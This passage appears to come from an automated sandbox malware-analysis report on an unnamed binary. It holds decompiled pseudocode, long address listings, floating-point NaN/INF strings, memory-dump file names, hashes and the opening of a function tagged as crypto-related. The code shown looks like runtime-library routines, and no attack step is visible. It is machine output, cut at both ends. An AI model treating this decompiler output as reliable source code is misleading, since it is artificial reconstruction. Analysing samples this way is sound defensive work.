												_t1031 = 9;
											}
											_t1208 = _t1210 + _t1031;
											_v1872 = _t1208;
											__eflags = _t1208 - _v1916;
											if(__eflags != 0) {
												continue;
											}
											goto L303;
										}
									}
									L303:
									 *_t1208 = 0;
									goto L309;
								}
							}
						}
					}
				} else {
					_t1031 = _t1196 & 0x000fffff;
					if((_t1146 | _t1196 & 0x000fffff) != 0) {
						goto L5;
					} else {
						_push(0x97db4);
						 *((intOrPtr*)(_v1924 + 4)) =  *(_v1924 + 4) & 0x00000000;
						L308:
						_push(_a24);
						_push(_t1016);
						if(E00088484() != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00088849();
							asm("int3");
							_push(_t1235);
							_push(_t1196);
							_t1197 = _v2424;
							__eflags = _t1197;
							if(_t1197 != 0) {
								_t740 = _v0;
								__eflags = _t740;
								if(_t740 != 0) {
									_push(_t1146);
									_t1147 = _a8;
									__eflags = _t1147;
									if(_t1147 == 0) {
										L320:
										E0007F350(_t1147, _t740, 0, _a4);
										__eflags = _t1147;
										if(_t1147 != 0) {
											__eflags = _a4 - _t1197;
											if(_a4 >= _t1197) {
												_t742 = 0x16;
											} else {
												_t743 = E0008895A();
												_push(0x22);
												goto L324;
											}
										} else {
											_t743 = E0008895A();
											_push(0x16);
											L324:
											_pop(_t1199);
											 *_t743 = _t1199;
											E00088839();
											_t742 = _t1199;
										}
									} else {
										__eflags = _a4 - _t1197;
										if(_a4 < _t1197) {
											goto L320;
										} else {
											E0007F4B0(_t740, _t1147, _t1197);
											_t742 = 0;
										}
									}
								} else {
									_t746 = E0008895A();
									_t1200 = 0x16;
									 *_t746 = _t1200;
									E00088839();
									_t742 = _t1200;
								}
							} else {
								_t742 = 0;
							}
							return _t742;
						} else {
							L309:
							_t1248 = _v1936;
							if(_v1936 != 0) {
								E0008EB21(_t1031, _t1248,  &_v1944);
							}
							return E0007EC4A(_v8 ^ _t1235);
						}
					}
				}
			}

0x0008d019
0x0008d020
0x0008d024
0x0008d02f
0x0008d032
0x0008d038
0x0008d03e
0x0008d043
0x0008d052
0x0008d054
0x0008d056
0x0008d056
0x0008d05d
0x0008d067
0x0008d06c
0x0008d06f
0x0008d093
0x0008d097
0x0008d09c
0x0008d09d
0x0008d09f
0x0008d0a1
0x0008d0a7
0x0008d0a7
0x0008d0ae
0x0008d0ae
0x0008d0b1
0x0008e361
0x00000000
0x0008d0b7
0x0008d0b7
0x0008d0b7
0x0008d0ba
0x0008e35a
0x00000000
0x0008d0c0
0x0008d0c0
0x0008d0c0
0x0008d0c3
0x0008e353
0x00000000
0x0008d0c9
0x0008d0c9
0x0008d0cc
0x0008e34c
0x00000000
0x0008d0d2
0x0008d0db
0x0008d0e3
0x0008d0e6
0x0008d0e9
0x0008d0ec
0x0008d0f2
0x0008d0fa
0x0008d100
0x0008d10a
0x0008d10a
0x0008d10d
0x0008d115
0x0008d11c
0x0008d11c
0x0008d10f
0x0008d10f
0x0008d111
0x0008d124
0x0008d12a
0x0008d12c
0x0008d130
0x0008d135
0x0008d142
0x0008d144
0x0008d14a
0x0008d14f
0x0008d150
0x0008d151
0x0008d15b
0x0008d160
0x0008d166
0x0008d16b
0x0008d174
0x0008d174
0x0008d176
0x0008d16d
0x0008d16d
0x0008d172
0x00000000
0x00000000
0x0008d172
0x0008d17c
0x0008d184
0x0008d186
0x0008d18f
0x0008d190
0x0008d196
0x0008d198
0x0008d58b
0x0008d591
0x0008d6b0
0x0008d6b0
0x0008d6b7
0x0008d6b7
0x0008d6b7
0x0008d6be
0x0008d6c1
0x0008d6c8
0x0008d6c8
0x0008d6c3
0x0008d6c3
0x0008d6c3
0x0008d6cc
0x0008d6cd
0x0008d6cf
0x0008d6d2
0x0008d6d5
0x0008d6d8
0x0008d6de
0x0008d6e1
0x0008d6e4
0x0008d6ee
0x0008d6ee
0x0008d6ee
0x0008d6e6
0x0008d6e6
0x0008d6e8
0x00000000
0x0008d6ea
0x0008d6ea
0x0008d6ea
0x0008d6e8
0x0008d6f0
0x0008d6f2
0x0008d793
0x0008d793
0x0008d7a0
0x0008d7a0
0x0008d7a0
0x0008d7a7
0x0008d7a9
0x0008d7b0
0x0008d7b5
0x0008d7b6
0x0008d7bb
0x0008d6f8
0x0008d6f8
0x0008d6fa
0x00000000
0x0008d700
0x0008d702
0x0008d703
0x0008d705
0x0008d707
0x0008d707
0x0008d709
0x0008d70c
0x0008d714
0x0008d716
0x0008d719
0x0008d71f
0x0008d71f
0x0008d721
0x0008d72d
0x0008d72d
0x0008d72d
0x0008d723
0x0008d725
0x0008d725
0x0008d734
0x0008d737
0x0008d739
0x0008d740
0x0008d740
0x0008d73b
0x0008d73b
0x0008d73b
0x0008d748
0x0008d752
0x0008d758
0x0008d759
0x0008d75e
0x0008d764
0x0008d767
0x00000000
0x00000000
0x0008d769
0x0008d769
0x0008d771
0x0008d771
0x0008d777
0x0008d77e
0x0008d78b
0x0008d780
0x0008d780
0x0008d783
0x0008d783
0x0008d77e
0x0008d6fa
0x0008d7c7
0x0008d7d7
0x0008d7e4
0x0008d7e6
0x0008d7ed
0x0008d597
0x0008d597
0x0008d5a0
0x0008d5a1
0x0008d5ab
0x0008d5b1
0x0008d5b3
0x0008d5b9
0x0008d5b9
0x0008d5bb
0x0008d5bb
0x0008d5c2
0x0008d5c9
0x00000000
0x00000000
0x0008d5cf
0x0008d5d2
0x0008d5d5
0x00000000
0x0008d5d7
0x0008d5d7
0x0008d5d7
0x0008d5d7
0x0008d5de
0x0008d5e1
0x0008d5e8
0x0008d5e8
0x0008d5e3
0x0008d5e3
0x0008d5e3
0x0008d5ec
0x0008d5ef
0x0008d5f1
0x0008d5f3
0x0008d5f9
0x0008d5ff
0x0008d601
0x0008d601
0x0008d601
0x0008d608
0x0008d608
0x0008d60a
0x0008d616
0x0008d616
0x0008d616
0x0008d60c
0x0008d60e
0x0008d60e
0x0008d61d
0x0008d620
0x0008d622
0x0008d629
0x0008d629
0x0008d624
0x0008d624
0x0008d624
0x0008d631
0x0008d63c
0x0008d642
0x0008d643
0x0008d648
0x0008d64e
0x0008d651
0x00000000
0x00000000
0x0008d653
0x0008d653
0x0008d65d
0x0008d668
0x0008d670
0x0008d676
0x0008d681
0x0008d687
0x0008d68e
0x0008d6a1
0x0008d6a8
0x0008d6a8
0x00000000
0x0008d5d5
0x0008d5bb
0x00000000
0x0008d5b3
0x0008d7f0
0x0008d7f0
0x0008d7f6
0x0008d7fb
0x0008d801
0x0008d801
0x0008d804
0x0008d80b
0x0008d812
0x0008d813
0x0008d814
0x0008d819
0x0008d19e
0x0008d19e
0x0008d1a7
0x0008d1a8
0x0008d1b2
0x0008d1b8
0x0008d1ba
0x0008d3c0
0x0008d3c8
0x0008d3cb
0x0008d3d0
0x0008d3d3
0x0008d3db
0x0008d3df
0x0008d3e5
0x0008d3eb
0x0008d3f0
0x0008d3f7
0x0008d3f8
0x0008d3f8
0x0008d3f8
0x0008d3ff
0x0008d402
0x0008d40a
0x0008d410
0x0008d415
0x0008d415
0x0008d412
0x0008d412
0x0008d412
0x0008d419
0x0008d41a
0x0008d41c
0x0008d41f
0x0008d425
0x0008d42b
0x0008d42e
0x0008d431
0x0008d437
0x0008d43a
0x0008d43d
0x0008d447
0x0008d447
0x0008d447
0x0008d43f
0x0008d43f
0x0008d441
0x00000000
0x0008d443
0x0008d443
0x0008d443
0x0008d441
0x0008d449
0x0008d44b
0x0008d53d
0x0008d53d
0x0008d53f
0x0008d544
0x0008d545
0x0008d54b
0x0008d557
0x0008d55e
0x0008d55f
0x0008d560
0x0008d565
0x0008d451
0x0008d451
0x0008d453
0x00000000
0x0008d459
0x0008d45b
0x0008d45c
0x0008d45e
0x0008d460
0x0008d462
0x0008d462
0x0008d468
0x0008d46a
0x0008d470
0x0008d473
0x0008d481
0x0008d487
0x0008d487
0x0008d489
0x0008d48c
0x0008d492
0x0008d492
0x0008d494
0x00000000
0x00000000
0x0008d496
0x0008d498
0x0008d49e
0x0008d49e
0x0008d49a
0x0008d49a
0x0008d49a
0x0008d4a3
0x0008d4a5
0x0008d4ac
0x0008d4ac
0x0008d4a7
0x0008d4a7
0x0008d4a7
0x0008d4d2
0x0008d4d8
0x0008d4db
0x0008d4e1
0x0008d4e8
0x0008d4e9
0x0008d4ea
0x0008d4f0
0x0008d4f3
0x0008d4f5
0x00000000
0x0008d4f5
0x00000000
0x0008d4f3
0x0008d4fd
0x0008d503
0x0008d50b
0x0008d50b
0x0008d50c
0x0008d50e
0x0008d512
0x0008d51a
0x0008d51a
0x0008d51a
0x0008d51c
0x0008d523
0x0008d528
0x0008d535
0x0008d52a
0x0008d52d
0x0008d52d
0x0008d528
0x0008d453
0x0008d568
0x0008d572
0x0008d578
0x0008d57e
0x0008d584
0x0008d1c0
0x0008d1c0
0x0008d1c0
0x0008d1c2
0x0008d1c9
0x0008d1d0
0x00000000
0x00000000
0x0008d1d6
0x0008d1d9
0x0008d1dc
0x00000000
0x0008d1de
0x0008d1e6
0x0008d1eb
0x0008d1f0
0x0008d1f1
0x0008d1f3
0x0008d1fb
0x0008d1ff
0x0008d205
0x0008d20b
0x0008d210
0x0008d217
0x0008d217
0x0008d218
0x0008d21b
0x0008d223
0x0008d229
0x0008d22e
0x0008d22e
0x0008d22b
0x0008d22b
0x0008d22b
0x0008d232
0x0008d233
0x0008d235
0x0008d238
0x0008d23e
0x0008d244
0x0008d247
0x0008d24a
0x0008d250
0x0008d253
0x0008d256
0x0008d260
0x0008d260
0x0008d260
0x0008d258
0x0008d258
0x0008d25a
0x00000000
0x0008d25c
0x0008d25c
0x0008d25c
0x0008d25a
0x0008d262
0x0008d264
0x0008d359
0x0008d359
0x0008d35b
0x0008d360
0x0008d361
0x0008d367
0x0008d373
0x0008d37a
0x0008d37b
0x0008d37c
0x0008d381
0x0008d26a
0x0008d26a
0x0008d26c
0x00000000
0x0008d272
0x0008d274
0x0008d275
0x0008d277
0x0008d279
0x0008d27b
0x0008d27b
0x0008d281
0x0008d283
0x0008d289
0x0008d28c
0x0008d29a
0x0008d2a0
0x0008d2a0
0x0008d2a2
0x0008d2a5
0x0008d2ab
0x0008d2ab
0x0008d2ad
0x00000000
0x00000000
0x0008d2af
0x0008d2b1
0x0008d2b7
0x0008d2b7
0x0008d2b3
0x0008d2b3
0x0008d2b3
0x0008d2bc
0x0008d2be
0x0008d2cb
0x0008d2cb
0x0008d2c0
0x0008d2c6
0x0008d2c6
0x0008d2e9
0x0008d2f1
0x0008d2f8
0x0008d2ff
0x0008d300
0x0008d303
0x0008d309
0x0008d30f
0x0008d312
0x0008d314
0x00000000
0x0008d314
0x00000000
0x0008d312
0x0008d31c
0x0008d322
0x0008d322
0x0008d328
0x0008d32a
0x0008d334
0x0008d336
0x0008d336
0x0008d336
0x0008d338
0x0008d33f
0x0008d344
0x0008d351
0x0008d346
0x0008d349
0x0008d349
0x0008d344
0x0008d26c
0x0008d384
0x0008d38f
0x0008d390
0x0008d391
0x0008d397
0x0008d39d
0x0008d3a3
0x0008d3a3
0x00000000
0x0008d1dc
0x00000000
0x0008d1c2
0x0008d3a4
0x0008d3aa
0x0008d3b1
0x0008d3b2
0x0008d3b3
0x0008d3b8
0x0008d3b8
0x0008d81c
0x0008d826
0x0008d827
0x0008d82d
0x0008d82f
0x0008dc98
0x0008dc9a
0x0008dc9c
0x0008dca2
0x0008dca4
0x0008dcaa
0x0008dcac
0x0008dffe
0x0008dffe
0x0008e000
0x0008e006
0x0008e00d
0x0008e013
0x0008e015
0x0008e0b3
0x0008e0b3
0x0008e0b5
0x0008e0b6
0x0008e0bc
0x00000000
0x0008e01b
0x0008e01b
0x0008e01e
0x0008e024
0x0008e02a
0x0008e02c
0x0008e032
0x0008e034
0x0008e034
0x0008e036
0x0008e036
0x0008e03f
0x0008e046
0x0008e04c
0x0008e04f
0x0008e050
0x0008e052
0x0008e052
0x0008e056
0x0008e058
0x0008e05a
0x0008e060
0x0008e063
0x00000000
0x0008e065
0x0008e065
0x0008e06c
0x0008e06c
0x0008e063
0x0008e058
0x0008e02c
0x0008e01e
0x0008e015
0x0008dcb2
0x0008dcb2
0x0008dcb2
0x0008dcb5
0x0008dcb9
0x0008dcb9
0x0008dcba
0x0008dccc
0x0008dcd9
0x0008dce8
0x0008dd12
0x0008dd17
0x0008dd1d
0x0008dd20
0x0008dd26
0x0008dd29
0x0008ddc2
0x0008ddc9
0x0008de47
0x0008de4d
0x0008de53
0x0008de56
0x0008de58
0x0008dee1
0x0008de5e
0x0008de5e
0x0008de64
0x0008de64
0x0008de6a
0x0008de70
0x0008de72
0x0008de74
0x0008de74
0x0008de7a
0x0008de80
0x0008de82
0x0008de8a
0x0008de8a
0x0008de90
0x0008de92
0x0008de94
0x0008de9a
0x0008de9c
0x0008dfb3
0x0008dfb5
0x0008dfbb
0x0008dfbb
0x0008dfbe
0x0008dfbf
0x00000000
0x0008dea2
0x0008dea8
0x0008dea8
0x0008deaa
0x0008deb0
0x0008deb3
0x0008deba
0x0008dec0
0x0008dec2
0x0008dee9
0x0008deeb
0x0008deed
0x0008deef
0x0008def5
0x0008defb
0x0008df95
0x0008df95
0x0008df98
0x00000000
0x0008df9e
0x0008df9e
0x0008dfa4
0x00000000
0x0008dfa4
0x0008df01
0x0008df01
0x0008df01
0x0008df04
0x00000000
0x00000000
0x0008df06
0x0008df08
0x0008df0a
0x0008df13
0x0008df13
0x0008df15
0x0008df1b
0x0008df1b
0x0008df27
0x0008df32
0x0008df35
0x0008df42
0x0008df45
0x0008df46
0x0008df47
0x0008df4d
0x0008df4f
0x0008df55
0x0008df5b
0x00000000
0x00000000
0x00000000
0x00000000
0x0008df5d
0x0008df5d
0x0008df5d
0x0008df5f
0x00000000
0x00000000
0x0008df61
0x0008df64
0x00000000
0x0008df6a
0x0008df6a
0x0008df6c
0x0008df6e
0x0008df6e
0x0008df6e
0x0008df76
0x0008df79
0x0008df79
0x0008df7f
0x0008df81
0x0008df83
0x0008df8a
0x0008df90
0x0008df92
0x00000000
0x0008df92
0x00000000
0x0008df64
0x00000000
0x0008df5d
0x00000000
0x0008df01
0x0008dec4
0x0008dec4
0x0008dec6
0x0008decc
0x0008ded3
0x0008ded3
0x0008ded6
0x0008ded6
0x00000000
0x0008dec6
0x00000000
0x0008dfaa
0x0008dfaa
0x0008dfab
0x0008dfab
0x00000000
0x0008deb0
0x0008ddcb
0x0008ddcb
0x0008ddd6
0x0008dddd
0x0008dde3
0x0008ddea
0x0008ddeb
0x0008ddec
0x0008ddf1
0x0008ddf4
0x0008ddf6
0x00000000
0x0008ddfc
0x0008ddfc
0x0008ddff
0x00000000
0x0008de05
0x0008de05
0x0008de0c
0x00000000
0x0008de12
0x0008de18
0x0008de1a
0x0008de20
0x0008de20
0x0008de22
0x0008de22
0x0008de24
0x0008de2d
0x0008de34
0x0008de37
0x0008de38
0x0008de3a
0x0008de3a
0x00000000
0x0008de42
0x0008de0c
0x0008ddff
0x0008ddf6
0x0008dd2f
0x0008dd2f
0x0008dd35
0x0008dd37
0x0008dd53
0x0008dd56
0x00000000
0x0008dd5c
0x0008dd5c
0x0008dd63
0x00000000
0x0008dd69
0x0008dd6f
0x0008dd71
0x0008dd77
0x0008dd77
0x0008dd79
0x0008dd79
0x0008dd7b
0x0008dd84
0x0008dd8b
0x0008dd8e
0x0008dd8f
0x0008dd91
0x0008dd91
0x0008dd99
0x0008dd99
0x0008dd9b
0x00000000
0x0008dda1
0x0008dda1
0x0008dda7
0x0008ddaa
0x0008e074
0x0008e076
0x0008e077
0x0008e07d
0x0008e089
0x0008e090
0x0008e091
0x0008e092
0x0008e097
0x0008e09a
0x0008ddb0
0x0008ddb0
0x0008ddb7
0x00000000
0x0008ddb7
0x0008ddaa
0x0008dd9b
0x0008dd63
0x0008dd39
0x0008dd39
0x0008dd3b
0x0008dd41
0x0008dd47
0x0008dd48
0x0008dfc5
0x0008dfc5
0x0008dfcc
0x0008dfcd
0x0008dfce
0x0008dfd3
0x0008dfd6
0x0008dfd6
0x0008dfd6
0x0008dd37
0x0008dfd8
0x0008dfd8
0x0008dfda
0x0008e0a1
0x0008e0a8
0x0008e0af
0x0008e0c2
0x0008e0c8
0x0008e0c9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0008dfe0
0x0008dfe6
0x0008dfe6
0x0008dfec
0x0008dfec
0x0008dff8
0x00000000
0x0008dff8
0x0008d835
0x0008d835
0x0008d837
0x0008d83d
0x0008d83f
0x0008d845
0x0008d847
0x0008dbbe
0x0008dbbe
0x0008dbc0
0x0008dbc6
0x0008dbcd
0x0008dbcf
0x0008dc2e
0x0008dc31
0x0008dc37
0x0008dc3d
0x0008dc43
0x0008dc45
0x0008dc4b
0x0008dc4d
0x0008dc4d
0x0008dc4f
0x0008dc4f
0x0008dc51
0x0008dc5a
0x0008dc61
0x0008dc64
0x0008dc65
0x0008dc67
0x0008dc67
0x0008dc6f
0x0008dc71
0x0008dc77
0x0008dc7d
0x0008dc80
0x00000000
0x0008dc86
0x0008dc86
0x0008dc8d
0x0008dc8d
0x0008dc80
0x0008dc71
0x0008dc45
0x0008dbd1
0x0008dbd1
0x0008dbd3
0x0008dbd9
0x0008dbdf
0x00000000
0x0008dbdf
0x0008dbcf
0x0008d84d
0x0008d84d
0x0008d84d
0x0008d850
0x0008d854
0x0008d854
0x0008d855
0x0008d867
0x0008d874
0x0008d883
0x0008d8ad
0x0008d8b2
0x0008d8b8
0x0008d8bb
0x0008d8c1
0x0008d8c4
0x0008d940
0x0008d947
0x0008da0b
0x0008da11
0x0008da17
0x0008da1a
0x0008da1c
0x0008daa5
0x0008da22
0x0008da22
0x0008da28
0x0008da28
0x0008da2e
0x0008da34
0x0008da36
0x0008da38
0x0008da38
0x0008da3e
0x0008da44
0x0008da46
0x0008da4e
0x0008da4e
0x0008da54
0x0008da56
0x0008da58
0x0008da5e
0x0008da60
0x0008db77
0x0008db79
0x0008db7f
0x0008db7f
0x00000000
0x0008da66
0x0008da6c
0x0008da6c
0x0008da6e
0x0008da74
0x0008da77
0x0008da7e
0x0008da84
0x0008da86
0x0008daad
0x0008daaf
0x0008dab1
0x0008dab3
0x0008dab9
0x0008dabf
0x0008db59
0x0008db59
0x0008db5c
0x00000000
0x0008db62
0x0008db62
0x0008db68
0x00000000
0x0008db68
0x0008dac5
0x0008dac5
0x0008dac5
0x0008dac8
0x00000000
0x00000000
0x0008daca
0x0008dacc
0x0008dace
0x0008dad7
0x0008dad7
0x0008dad9
0x0008dadf
0x0008dadf
0x0008daeb
0x0008daf6
0x0008daf9
0x0008db06
0x0008db09
0x0008db0a
0x0008db0b
0x0008db11
0x0008db13
0x0008db19
0x0008db1f
0x00000000
0x00000000
0x00000000
0x00000000
0x0008db21
0x0008db21
0x0008db21
0x0008db23
0x00000000
0x00000000
0x0008db25
0x0008db28
0x0008dbe2
0x0008dbe2
0x0008dbe4
0x0008dbea
0x0008dbf0
0x0008dbf1
0x00000000
0x0008db2e
0x0008db2e
0x0008db30
0x0008db32
0x0008db32
0x0008db32
0x0008db3a
0x0008db3d
0x0008db3d
0x0008db43
0x0008db45
0x0008db47
0x0008db4e
0x0008db54
0x0008db56
0x00000000
0x0008db56
0x00000000
0x0008db28
0x00000000
0x0008db21
0x00000000
0x0008dac5
0x0008da88
0x0008da88
0x0008da8a
0x0008da90
0x0008da97
0x0008da97
0x0008da9a
0x0008da9a
0x00000000
0x0008da8a
0x00000000
0x0008db6e
0x0008db6e
0x0008db6f
0x0008db6f
0x00000000
0x0008da74
0x0008d94d
0x0008d94d
0x0008d958
0x0008d95f
0x0008d965
0x0008d96c
0x0008d96d
0x0008d96e
0x0008d973
0x0008d976
0x0008d978
0x0008d994
0x0008d997
0x00000000
0x0008d99d
0x0008d99d
0x0008d9a4
0x00000000
0x0008d9aa
0x0008d9b0
0x0008d9b2
0x0008d9b8
0x0008d9b8
0x0008d9ba
0x0008d9ba
0x0008d9bc
0x0008d9c5
0x0008d9cc
0x0008d9cf
0x0008d9d0
0x0008d9d2
0x0008d9d2
0x00000000
0x0008d9ba
0x0008d9a4
0x0008d97a
0x0008d97c
0x0008d982
0x0008d988
0x0008d989
0x00000000
0x0008d989
0x0008d978
0x0008d8c6
0x0008d8c6
0x0008d8cc
0x0008d8ce
0x0008d8e3
0x0008d8e6
0x00000000
0x0008d8ec
0x0008d8ec
0x0008d8f3
0x00000000
0x0008d8f9
0x0008d8ff
0x0008d901
0x0008d907
0x0008d907
0x0008d909
0x0008d909
0x0008d90b
0x0008d914
0x0008d91b
0x0008d91e
0x0008d91f
0x0008d921
0x0008d921
0x0008d9da
0x0008d9da
0x0008d9dc
0x00000000
0x0008d9e2
0x0008d9e2
0x0008d9e8
0x0008d9eb
0x0008d92e
0x0008d935
0x00000000
0x0008d9f1
0x0008d9f3
0x0008d9f9
0x0008d9ff
0x0008da00
0x0008dbf7
0x0008dbf7
0x0008dbfe
0x0008dbff
0x0008dc00
0x0008dc05
0x0008dc08
0x0008dc08
0x0008d9eb
0x0008d9dc
0x0008d8f3
0x0008d8d0
0x0008d8d0
0x0008d8d2
0x0008d8d8
0x0008db82
0x0008db82
0x0008db83
0x0008db89
0x0008db89
0x0008db90
0x0008db91
0x0008db92
0x0008db97
0x0008db9a
0x0008db9a
0x0008db9a
0x0008d8ce
0x0008db9c
0x0008db9c
0x0008db9e
0x0008dc0c
0x0008dc13
0x0008dc13
0x0008dc13
0x0008dc1a
0x0008dc1c
0x0008dc22
0x0008dc23
0x0008e0cf
0x0008e0cf
0x0008e0d0
0x0008e0d1
0x0008e0d6
0x00000000
0x00000000
0x00000000
0x00000000
0x0008dba0
0x0008dba6
0x0008dba6
0x0008dbac
0x0008dbac
0x0008dbb8
0x00000000
0x0008dbb8
0x0008d847
0x0008e0d9
0x0008e0d9
0x0008e0df
0x0008e0e1
0x0008e0e7
0x0008e0ed
0x0008e0ef
0x0008e0f1
0x0008e0f3
0x0008e0f3
0x0008e0f5
0x0008e0f5
0x0008e0fe
0x0008e0ff
0x0008e103
0x0008e10a
0x0008e10d
0x0008e10e
0x0008e110
0x0008e110
0x0008e114
0x0008e11a
0x0008e11c
0x0008e122
0x0008e124
0x0008e12a
0x0008e12d
0x0008e140
0x0008e142
0x0008e143
0x0008e149
0x0008e155
0x0008e15c
0x0008e15d
0x0008e15e
0x0008e163
0x0008e12f
0x0008e131
0x0008e138
0x0008e138
0x0008e12d
0x0008e166
0x0008e166
0x0008e176
0x0008e17f
0x0008e180
0x0008e182
0x0008e219
0x0008e21b
0x0008e226
0x0008e226
0x0008e228
0x0008e22b
0x0008e22d
0x00000000
0x0008e21d
0x0008e223
0x0008e223
0x0008e188
0x0008e188
0x0008e18e
0x0008e191
0x0008e197
0x0008e19a
0x0008e1a0
0x0008e1a2
0x0008e1a8
0x0008e1aa
0x0008e1ac
0x0008e1ac
0x0008e1ae
0x0008e1ae
0x0008e1bb
0x0008e1c2
0x0008e1c5
0x0008e1c6
0x0008e1c8
0x0008e1c9
0x0008e1c9
0x0008e1cd
0x0008e1d3
0x0008e1d5
0x0008e1d7
0x0008e1dd
0x0008e1e0
0x0008e1f3
0x0008e1f4
0x0008e1fa
0x0008e206
0x0008e20d
0x0008e20e
0x0008e20f
0x0008e214
0x0008e1e2
0x0008e1e2
0x0008e1e9
0x0008e1e9
0x0008e1e0
0x0008e1d5
0x0008e233
0x0008e233
0x0008e233
0x0008e23f
0x0008e242
0x0008e248
0x0008e24a
0x0008e24c
0x0008e252
0x0008e254
0x0008e254
0x0008e254
0x0008e252
0x0008e259
0x0008e25a
0x0008e25c
0x0008e25e
0x0008e25e
0x0008e260
0x0008e266
0x0008e26c
0x0008e26e
0x0008e274
0x0008e274
0x0008e27a
0x0008e27c
0x00000000
0x00000000
0x0008e282
0x0008e284
0x0008e286
0x0008e286
0x0008e288
0x0008e288
0x0008e298
0x0008e29f
0x0008e2a2
0x0008e2a3
0x0008e2a5
0x0008e2a5
0x0008e2a9
0x0008e2af
0x0008e2b1
0x0008e2b3
0x0008e2b9
0x0008e2bc
0x0008e2cd
0x0008e2cf
0x0008e2d0
0x0008e2d6
0x0008e2e2
0x0008e2e9
0x0008e2ea
0x0008e2eb
0x0008e2f0
0x0008e2be
0x0008e2be
0x0008e2c5
0x0008e2c5
0x0008e2bc
0x0008e301
0x0008e310
0x0008e311
0x0008e311
0x0008e313
0x0008e315
0x0008e315
0x0008e31b
0x0008e31e
0x0008e320
0x0008e322
0x0008e322
0x0008e325
0x0008e326
0x0008e326
0x0008e32b
0x0008e32e
0x0008e332
0x0008e332
0x0008e333
0x0008e335
0x0008e33b
0x0008e341
0x00000000
0x00000000
0x00000000
0x0008e341
0x0008e274
0x0008e347
0x0008e347
0x00000000
0x0008e347
0x0008d0cc
0x0008d0c3
0x0008d0ba
0x0008d071
0x0008d075
0x0008d07d
0x00000000
0x0008d07f
0x0008d085
0x0008d08a
0x0008e366
0x0008e366
0x0008e369
0x0008e374
0x0008e39f
0x0008e3a0
0x0008e3a1
0x0008e3a2
0x0008e3a3
0x0008e3a4
0x0008e3a9
0x0008e3ac
0x0008e3af
0x0008e3b0
0x0008e3b3
0x0008e3b5
0x0008e3bb
0x0008e3be
0x0008e3c0
0x0008e3d5
0x0008e3d6
0x0008e3d9
0x0008e3db
0x0008e3f1
0x0008e3f7
0x0008e3ff
0x0008e401
0x0008e40c
0x0008e40f
0x0008e426
0x0008e411
0x0008e411
0x0008e416
0x00000000
0x0008e416
0x0008e403
0x0008e403
0x0008e408
0x0008e418
0x0008e418
0x0008e419
0x0008e41b
0x0008e420
0x0008e420
0x0008e3dd
0x0008e3dd
0x0008e3e0
0x00000000
0x0008e3e2
0x0008e3e5
0x0008e3ed
0x0008e3ed
0x0008e3e0
0x0008e3c2
0x0008e3c2
0x0008e3c9
0x0008e3ca
0x0008e3cc
0x0008e3d1
0x0008e3d1
0x0008e3b7
0x0008e3b7
0x0008e3b7
0x0008e42a
0x0008e376
0x0008e376
0x0008e376
0x0008e380
0x0008e389
0x0008e38e
0x0008e39c
0x0008e39c
0x0008e374
0x0008d07d

APIs

__floor_pentium4.LIBCMT ref: 0008D154

Strings

1#SNAN, xrefs: 0008E353
1#QNAN, xrefs: 0008E35A
1#INF, xrefs: 0008E361
1#IND, xrefs: 0008E34C

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: a940f36770cd9d1da0c88cb573bf7d9d031601d68f0011f8ccbd5e4076b89fd4
Instruction ID: 559f96ae0a1a5cd4bfa9425ded2a116f4d8556c9d92f291e7f8fc70db623eaed
Opcode Fuzzy Hash: a940f36770cd9d1da0c88cb573bf7d9d031601d68f0011f8ccbd5e4076b89fd4
Instruction Fuzzy Hash: 0DC25972E086288BDB65EE28DD447E9B7F5FB44314F1442EAD48DE7281E774AE818F40

Uniqueness

Uniqueness Score: -1.00%

Function 000627E8 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 794
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E000627E8(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				unsigned int _t334;
				signed int _t338;
				char _t357;
				signed short _t364;
				signed int _t369;
				signed int _t376;
				signed char _t379;
				signed char _t382;
				char _t399;
				signed int _t400;
				signed int _t404;
				signed char _t418;
				intOrPtr _t419;
				char _t420;
				signed int _t423;
				signed int _t424;
				signed char _t429;
				signed int _t432;
				signed int _t436;
				signed short _t441;
				signed short _t446;
				unsigned int _t451;
				signed int _t454;
				void* _t457;
				signed int _t459;
				signed int _t462;
				void* _t469;
				signed int _t475;
				unsigned int _t480;
				void* _t481;
				void* _t488;
				void* _t489;
				signed char _t495;
				signed int _t509;
				intOrPtr* _t523;
				signed int _t526;
				signed int _t527;
				intOrPtr* _t528;
				signed int _t536;
				signed int _t541;
				signed int _t543;
				unsigned int _t552;
				signed int _t554;
				signed int _t567;
				signed char _t569;
				signed int _t570;
				void* _t593;
				signed int _t597;
				signed int _t609;
				signed int _t611;
				signed int _t613;
				unsigned int _t620;
				signed char _t636;
				signed char _t647;
				signed int _t650;
				unsigned int _t651;
				signed int _t654;
				signed int _t655;
				signed int _t657;
				signed int _t658;
				unsigned int _t660;
				signed int _t664;
				void* _t665;
				void* _t672;
				signed int _t675;
				signed int _t676;
				signed char _t677;
				signed int _t680;
				void* _t682;
				signed int _t688;
				signed int _t689;
				void* _t695;
				signed int _t696;
				signed int _t697;
				signed int _t705;
				signed int _t706;
				intOrPtr _t709;
				void* _t710;
				signed char _t719;

				_t528 = __ecx;
				E0007E28C(E00091CEF, _t710);
				E0007E360();
				_t523 = _t528;
				 *((intOrPtr*)(_t710 + 0x20)) = _t523;
				E0006C565(_t710 + 0x24, _t523);
				 *((intOrPtr*)(_t710 + 0x1c)) = 0;
				 *((intOrPtr*)(_t710 - 4)) = 0;
				_t664 = 7;
